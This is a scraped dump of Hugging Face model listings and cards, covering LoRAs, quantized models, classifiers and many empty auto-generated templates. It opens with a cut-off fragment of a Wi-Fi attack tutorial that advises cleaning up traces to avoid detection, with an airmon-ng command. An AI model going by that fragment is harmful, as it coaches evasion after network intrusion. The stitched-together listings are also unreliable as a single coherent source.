8. **Cleanup**: Remember to clean up any traces of your activities to avoid detection and legal consequences.
```bash
airmon-ng stop wlan0mon
```
Please note that all these steps should be performed in a legal and ethical manner, and only on networks you have permission to test. Unauthorized access to computer networks is illegal and unethical.
|
outlookAi/ITWKcJBZS2 | outlookAi | 2024-10-10T10:20:11Z | 11 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2024-10-10T09:42:56Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: Noy
---
# Itwkcjbzs2
<!-- <Gallery /> -->
Trained on Replicate using:
https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `Noy` to trigger the image generation.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('outlookAi/ITWKcJBZS2', weight_name='lora.safetensors')
image = pipeline('your prompt').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
|
QuantFactory/MentaLLaMA-chat-7B-GGUF | QuantFactory | 2024-10-10T10:17:11Z | 75 | 3 | null | [
"gguf",
"medical",
"en",
"arxiv:2309.13567",
"license:mit",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T07:32:47Z |
---
license: mit
language:
- en
metrics:
- f1
tags:
- medical
---
[](https://hf.co/QuantFactory)
# QuantFactory/MentaLLaMA-chat-7B-GGUF
This is quantized version of [klyang/MentaLLaMA-chat-7B](https://huggingface.co/klyang/MentaLLaMA-chat-7B) created using llama.cpp
# Original Model Card
# Introduction
MentaLLaMA-chat-7B is part of the [MentaLLaMA](https://github.com/SteveKGYang/MentalLLaMA) project, the first open-source large language model (LLM) series for
interpretable mental health analysis with instruction-following capability. This model is finetuned based on the Meta LLaMA2-chat-7B foundation model and the full IMHI instruction tuning data.
The model is expected to make complex mental health analysis for various mental health conditions and give reliable explanations for each of its predictions.
It is fine-tuned on the IMHI dataset with 75K high-quality natural language instructions to boost its performance in downstream tasks.
We perform a comprehensive evaluation on the IMHI benchmark with 20K test samples. The result shows that MentalLLaMA approaches state-of-the-art discriminative
methods in correctness and generates high-quality explanations.
# Ethical Consideration
Although experiments on MentaLLaMA show promising performance on interpretable mental health analysis, we stress that
all predicted results and generated explanations should only used
for non-clinical research, and the help-seeker should get assistance
from professional psychiatrists or clinical practitioners. In addition,
recent studies have indicated LLMs may introduce some potential
bias, such as gender gaps. Meanwhile, some incorrect prediction results, inappropriate explanations, and over-generalization
also illustrate the potential risks of current LLMs. Therefore, there
are still many challenges in applying the model to real-scenario
mental health monitoring systems.
## Other Models in MentaLLaMA
In addition to MentaLLaMA-chat-7B, the MentaLLaMA project includes another model: MentaLLaMA-chat-13B, MentalBART, MentalT5.
- **MentaLLaMA-chat-13B**: This model is finetuned based on the Meta LLaMA2-chat-13B foundation model and the full IMHI instruction tuning data. The training data covers 10 mental health analysis tasks.
- **MentalBART**: This model is finetuned based on the BART-large foundation model and the full IMHI-completion data. The training data covers 10 mental health analysis tasks. This model doesn't have instruction-following ability but is more lightweight and performs well in interpretable mental health analysis in a completion-based manner.
- **MentalT5**: This model is finetuned based on the T5-large foundation model and the full IMHI-completion data. The training data covers 10 mental health analysis tasks. This model doesn't have instruction-following ability but is more lightweight and performs well in interpretable mental health analysis in a completion-based manner.
## Usage
You can use the MentaLLaMA-chat-7B model in your Python project with the Hugging Face Transformers library. Here is a simple example of how to load the model:
```python
from transformers import LlamaTokenizer, LlamaForCausalLM
tokenizer = LlamaTokenizer.from_pretrained('klyang/MentaLLaMA-chat-7B')
model = LlamaForCausalLM.from_pretrained('klyang/MentaLLaMA-chat-7B', device_map='auto')
```
In this example, LlamaTokenizer is used to load the tokenizer, and LlamaForCausalLM is used to load the model. The `device_map='auto'` argument is used to automatically
use the GPU if it's available.
## License
MentaLLaMA-chat-7B is licensed under MIT. For more details, please see the MIT file.
## Citation
If you use MentaLLaMA-chat-7B in your work, please cite the our paper:
```bibtex
@misc{yang2023mentalllama,
title={MentalLLaMA: Interpretable Mental Health Analysis on Social Media with Large Language Models},
author={Kailai Yang and Tianlin Zhang and Ziyan Kuang and Qianqian Xie and Sophia Ananiadou},
year={2023},
eprint={2309.13567},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
|
alvynabranches/t5_konkani_small | alvynabranches | 2024-10-10T10:16:52Z | 115 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-10-10T10:16:38Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-101157-distilled-0.5alpha | Trelis | 2024-10-10T10:14:17Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T10:13:39Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
alex26x/distilbert-base-uncased-finetuned-emotion | alex26x | 2024-10-10T10:13:42Z | 106 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-10-10T09:54:49Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
- f1
model-index:
- name: distilbert-base-uncased-finetuned-emotion
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# distilbert-base-uncased-finetuned-emotion
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2211
- Accuracy: 0.9215
- F1: 0.9215
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 64
- eval_batch_size: 64
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:------:|
| 0.8338 | 1.0 | 250 | 0.3261 | 0.902 | 0.9003 |
| 0.2526 | 2.0 | 500 | 0.2211 | 0.9215 | 0.9215 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
KBLab/swedish-ocr-correction | KBLab | 2024-10-10T10:11:16Z | 15 | 0 | null | [
"safetensors",
"t5",
"license:apache-2.0",
"region:us"
] | null | 2024-10-10T08:54:03Z | ---
license: apache-2.0
---
# Swedish OCR Correction
This model is an updated version of https://huggingface.co/viklofg/swedish-ocr-correction
The model has been trained to correct OCR predictions by Abbyy, Tesseract, and a combination of those on newspaper from 1818-2018 (see [A Two-OCR Engine Method for Digitized Swedish Newspapers](https://ecp.ep.liu.se/index.php/clarin/article/view/8) ).
Please check the [original model](https://huggingface.co/viklofg/swedish-ocr-correction) for more information.
This new model has been trained much longer and manages to outperform the previous one using the same train-test split.
| Model | CER | WER |
| - | - | - |
| Original OCR | 3.01 | 13.23 |
| viklofg | 1.92 | 7.41 |
| KBLab | 1.57 | 6.23 |
|
sr1ncvs/afro_xlmr_ner | sr1ncvs | 2024-10-10T10:08:18Z | 6 | 0 | null | [
"safetensors",
"xlm-roberta",
"rw",
"dataset:masakhane/masakhaner2",
"base_model:Davlan/afro-xlmr-base",
"base_model:finetune:Davlan/afro-xlmr-base",
"license:apache-2.0",
"region:us"
] | null | 2024-10-10T10:00:36Z | ---
license: apache-2.0
datasets:
- masakhane/masakhaner2
language:
- rw
base_model:
- FacebookAI/xlm-roberta-base
- Davlan/afro-xlmr-base
---
## Afro-XLMR Finetuned for NER on MasakhaNER2 Dataset (Kinyarwanda)
On Epoch 3/3
- Avg Precision : 0.84
- Avg Recall : 0.88
- Avg F1 Score : 0.86
|
abdulmannan-01/qwen-2.5-0.5b-finetuned-for-sql-generation-combined-dataset | abdulmannan-01 | 2024-10-10T09:58:12Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:54:42Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
a-r-r-o-w/cogvideox-disney-adamw-3000-0.0003 | a-r-r-o-w | 2024-10-10T09:57:45Z | 17 | 8 | diffusers | [
"diffusers",
"text-to-video",
"diffusers-training",
"lora",
"cogvideox",
"cogvideox-diffusers",
"template:sd-lora",
"dataset:Wild-Heart/Disney-VideoGeneration-Dataset",
"base_model:THUDM/CogVideoX-5b",
"base_model:adapter:THUDM/CogVideoX-5b",
"region:us"
] | text-to-video | 2024-10-04T20:21:47Z | ---
datasets:
- Wild-Heart/Disney-VideoGeneration-Dataset
base_model:
- THUDM/CogVideoX-5b
pipeline_tag: text-to-video
library_name: diffusers
tags:
- text-to-video
- diffusers-training
- diffusers
- lora
- cogvideox
- cogvideox-diffusers
- template:sd-lora
---
# CogVideoX LoRA
<Gallery />
## Model description
These are `a-r-r-o-w/cogvideox-disney-adamw-3000-0.0003` LoRA weights for `THUDM/CogVideoX-5b`.
The weights were trained using the [CogVideoX Diffusers trainer](https://github.com/huggingface/diffusers/blob/main/examples/cogvideo/train_cogvideox_lora.py).
Was LoRA for the text encoder enabled? No.
## Download model
[Download the *.safetensors LoRA](a-r-r-o-w/cogvideox-disney-adamw-3000-0.0003/tree/main) in the Files & versions tab.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import CogVideoXPipeline
import torch
pipe = CogVideoXPipeline.from_pretrained("THUDM/CogVideoX-5b", torch_dtype=torch.bfloat16).to("cuda")
pipe.load_lora_weights("a-r-r-o-w/cogvideox-disney-adamw-3000-0.0003", weight_name="pytorch_lora_weights.safetensors", adapter_name="cogvideox-lora")
pipe.set_adapters(["cogvideox-lora"], [1.0])
video = pipe("BW_STYLE A black and white animated scene unfolds with an anthropomorphic goat surrounded by musical notes and symbols, suggesting a playful environment. Mickey Mouse appears, leaning forward in curiosity as the goat remains still. The goat then engages with Mickey, who bends down to converse or react. The dynamics shift as Mickey grabs the goat, potentially in surprise or playfulness, amidst a minimalistic background. The scene captures the evolving relationship between the two characters in a whimsical, animated setting, emphasizing their interactions and emotions", guidance_scale=6, use_dynamic_cfg=True).frames[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## License
Please adhere to the licensing terms as described [here](https://huggingface.co/THUDM/CogVideoX-5b/blob/main/LICENSE) and [here](https://huggingface.co/THUDM/CogVideoX-2b/blob/main/LICENSE). |
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-095132-distilled | Trelis | 2024-10-10T09:55:09Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:54:32Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
allknowingroger/Ph3task2-14B | allknowingroger | 2024-10-10T09:49:50Z | 24 | 0 | transformers | [
"transformers",
"safetensors",
"phi3",
"text-generation",
"mergekit",
"merge",
"conversational",
"custom_code",
"arxiv:2212.04089",
"base_model:failspy/Phi-3-medium-4k-instruct-abliterated-v3",
"base_model:merge:failspy/Phi-3-medium-4k-instruct-abliterated-v3",
"base_model:jpacifico/Chocolatine-14B-Instruct-DPO-v1.2",
"base_model:merge:jpacifico/Chocolatine-14B-Instruct-DPO-v1.2",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-09-08T07:43:09Z | ---
license: apache-2.0
library_name: transformers
tags:
- mergekit
- merge
base_model:
- jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
- failspy/Phi-3-medium-4k-instruct-abliterated-v3
model-index:
- name: Ph3task2-14B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 47.13
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 44.08
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 12.46
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 10.74
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 16.62
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 38.44
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
---
# merge
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
## Merge Details
### Merge Method
